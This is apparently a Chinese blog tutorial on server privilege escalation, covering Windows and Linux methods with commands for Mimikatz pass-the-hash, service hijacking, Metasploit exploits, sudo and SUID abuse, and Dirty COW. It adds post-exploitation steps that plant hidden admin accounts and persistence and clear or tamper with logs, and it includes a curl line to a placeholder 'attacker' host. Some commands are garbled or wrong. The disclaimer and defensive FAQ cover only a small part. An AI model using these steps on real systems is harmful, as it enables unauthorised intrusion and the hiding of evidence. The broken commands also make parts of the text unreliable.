提权前准备
权限确认
- 使用命令
whoami
或id
确认当前权限级别(如普通用户、Administrators组、root用户)。 - 检查目标系统版本、服务配置及补丁状态。
环境侦查
操作系统 | 侦查重点 |
---|---|
Windows | 补丁级别、共享目录、弱密码服务、注册表权限、进程权限 |
Linux | Sudo权限、历史命令记录、 crontab 任务、SUID程序 |
工具准备
- Windows:Metasploit、PowerUp、Mimikatz、Atlassian Crowbar。
- Linux:LinEnum、脏牛(Dirty COW)、Grsecurity绕过工具。
- 通用:Netcat、Python反弹shell脚本、权限提升Exploit数据库(如Exploit-DB)。
Windows系统提权方法
凭证窃取(黄金票据/白银票据)
- 适用场景:域环境且未修复相关漏洞(如MS14-068)。
- 工具:Mimikatz。
- 步骤:
- 获取域管理员凭据或Hash。
- 执行命令:
mimikatz.exe "privilege::debug"
+kglist
+sekurlsa::pth /user:Administrator /domain:域名 /ntlm:哈希 /run:cmd
。
服务权限滥用
- 适用场景:存在高权限服务(如System权限)。
- 步骤:
- 查找可劫持服务:
sc query type= service state= all
。 - 停止并修改服务二进制文件为
cmd.exe
。 - 启动服务触发命令执行。
- 查找可劫持服务:
漏洞利用(如MS15-051)
- 工具:Metasploit。
- 步骤:
- 启动Metasploit:
msfconsole
。 - 搜索模块:
search ms15-051
。 - 配置目标IP并执行:
exploit -j
。
- 启动Metasploit:
Linux系统提权方法
Sudo权限配置漏洞
- 场景:
/etc/sudoers
文件允许无密码执行命令。 - 操作:
sudo -l # 检查可执行命令 sudo command # sudo curl http://attacker:8080 -O /bin/sh
SUID程序滥用
- 常见程序:
nano
、vim
、perl
。 - 示例:
/bin/bash -p # 若SUID权限存在,可直接启动root shell
内核漏洞(Dirty COW)
- 适用场景:Linux内核版本≤4.8且开启命名空间。
- 工具:
dirtycow.c
编译后利用。
提权后操作规范
- 权限维持:
- 创建隐藏用户/后门:Windows添加管理员用户,Linux修改
/etc/passwd
。 - 植入持久化脚本(如rc.local或启动项)。
- 创建隐藏用户/后门:Windows添加管理员用户,Linux修改
- 日志清理:
- Windows:清除事件查看器日志(
wevtutil cl
)。 - Linux:修改
/var/log/auth.log
或禁用日志服务。
- Windows:清除事件查看器日志(
- 安全退出:删除工具文件,恢复服务状态。
风险与法律提示
风险类型 | 描述 |
---|---|
法律风险 | 未授权提权可能构成非法入侵(刑法第285条) |
系统损坏风险 | 错误操作可能导致系统崩溃或数据丢失 |
权限滥用风险 | 高权限账户可能被监控,操作需隐蔽 |
FAQs
Q1:提权是否违法?
A:仅在获得服务器所有者明确授权时合法(如企业安全测试),未授权操作涉嫌违法。
Q2:如何防范服务器被提权?
A:
- 及时更新系统补丁(尤其是Windows远程代码执行漏洞、Linux内核漏洞)。
- 禁用不必要的高权限服务,限制Sudo权限。
- 启用日志审计,监控异常登录行为。
小编有话说
服务器提权是双刃剑,技术本身无善恶,但操作场景决定其合法性,建议从业者:
- 明确授权:仅在客户授权或自有设备上测试。
- 最小权限原则:日常运维避免使用Administrator/root账户。
- 安全习惯:定期修改密码,禁用空密码和默认账户。
技术应服务于安全防护,而非成为攻击工具
各位小伙伴们,我刚刚为大家分享了有关“服务器提权详细教程”的知识,希望对你们有所帮助。如果您还有其他相关问题需要解决,欢迎随时提出哦!
【版权声明】:本站所有内容均来自网络,若无意侵犯到您的权利,请及时与我们联系将尽快删除相关内容!
发表回复